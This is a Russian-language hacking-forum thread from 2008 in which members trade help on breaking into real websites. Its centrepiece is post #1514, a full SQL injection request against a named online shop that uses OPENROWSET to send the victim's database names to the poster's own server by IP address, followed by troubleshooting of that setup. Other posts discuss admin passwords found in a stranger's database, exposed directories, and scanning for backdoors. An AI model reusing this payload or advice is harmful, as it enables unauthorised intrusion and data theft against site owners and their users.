HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1511  
Старый 02.04.2008, 18:02
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию

ну собственно не как купи проше деда да втыкай что душе угодно
 
Ответить с цитированием

  #1512  
Старый 02.04.2008, 19:12
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662

Репутация: 435
Отправить сообщение для Sharingan с помощью ICQ
По умолчанию

вот интересно, нашел сайт, есть таблица админы, ну и там одмины естт и пароли, но на сайте нет ни форума ни админки (сканил) на фтп не подходят, вопрос Зачем они нафиг нужны?
 
Ответить с цитированием

  #1513  
Старый 02.04.2008, 19:16
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

Цитата:
Сообщение от Sharingan  
вот интересно, нашел сайт, есть таблица админы, ну и там одмины естт и пароли, но на сайте нет ни форума ни админки (сканил) на фтп не подходят, вопрос Зачем они нафиг нужны?
может осталась от чего-то. или просто бд тестили. или фейк. или для другого домена. есть много вариантов
 
Ответить с цитированием

mssql-inject: приём данных на мой сервер
  #1514  
Старый 02.04.2008, 20:31
cyberia
Новичок
Регистрация: 29.03.2008
Сообщений: 7
Провел на форуме:
78255

Репутация: 0
Question mssql-inject: приём данных на мой сервер

Пробую сделать передачу данных через инжект на свой mssql-сервер. Но возникла проблема с моим принимающим сервером.

Купил windows-хостинг с выделенным ипом. Создал базу данных MSSQL 2005 с именем basename. Пользователь username с паролем password. Создал таблицу tbltest с колонкой pubs.

Посылаю запрос: http://www.top25cigar.com/reviewdatabase/product.asp?pkID=8797&showprod=yes&catpkID=315;ins ert+into+openrowset('sqloledb','uid=username;pwd=p assword;network=DBMSSOCN;Address=208.115.103.4','s elect+line+from+pubs..tbltest')+select+name+from+m aster..sysdatabases;--

В ответ получаю Cannot open user default database. Login failed. Хотя по умолчанию база данных установлена. Мне кажется, что ошибка где-то в правах доступа.

Что мне исправить? Ниже приложу несколько скриншотов из MSSQL Server Management Studio Express.



Последний раз редактировалось cyberia; 02.04.2008 в 20:33..
 
Ответить с цитированием

  #1515  
Старый 02.04.2008, 22:37
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

cyberia
1 акк корректен
2 твоя таблица создана и идентична по структуре
3 запрос без грамматических ошибок
4 есть права на чтение master..sysdatabases
Эти условия выполнены?
Помоеиу невыполнение ЛЮБОГО из условий не даст тебе ничего сделать.
Да , забыл, порт на котором твой сервер висит.
Имхо слишком много заморочек, но дело твоё конечно, проверь ВСЕ условия
 
Ответить с цитированием

  #1516  
Старый 03.04.2008, 17:50
Hell0
Новичок
Регистрация: 30.03.2008
Сообщений: 5
Провел на форуме:
7126

Репутация: 0
По умолчанию

Подскажите, что можно зделать есть маленький доступ

http://fialki.ho.com.ua/products_pictures/
вот от создателей
http://www.shop-script.ru/images/
или это не чего не дает
 
Ответить с цитированием

  #1517  
Старый 03.04.2008, 17:54
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307

Репутация: 114
Отправить сообщение для [aywo] с помощью ICQ
По умолчанию

2Hell0
Это дает только просмотр файлов и каталогов в данных директориях
 
Ответить с цитированием

  #1518  
Старый 03.04.2008, 21:27
Spaise
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме:
99208

Репутация: 21
По умолчанию

Здравствуйте, разесните мне пожалуйста один момент, при сканировании портов утилитой Shadow Security Scanner 7, она показывает что на сервере открыто огромное количество портов, среди них очень много бекдоров, нахожу клиен к бекдору, но не один не коннектится, пробовал на разных сайтах, где открыты эти порты, ни чего не получилось.
XSpyder'ом пробывал сканить, тот вообще не работает, ни трафу не жрет, ни порты не сканирует, только нагрузку на проц создает. Помогите пожалуйста дельным советом.
 
Ответить с цитированием

  #1519  
Старый 03.04.2008, 23:07
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Spaise
В чём вопрос то?
XSpyder не работает? Или открытые порты смущают?Огромное кол-во это сколько, и главное какие?С чего ты взял ,что "среди них очень много бекдоров", что за клиент к бекдору?
 
Ответить с цитированием

  #1520  
Старый 04.04.2008, 01:28
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662

Репутация: 435
Отправить сообщение для Sharingan с помощью ICQ
По умолчанию

товарисчи напомните как вывести имя бд, для опр. таблицы, schema_name помню, а откуд забыл
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 13 (пользователей: 0 , гостей: 13)
 


Быстрый переход




ANTICHAT.XYZ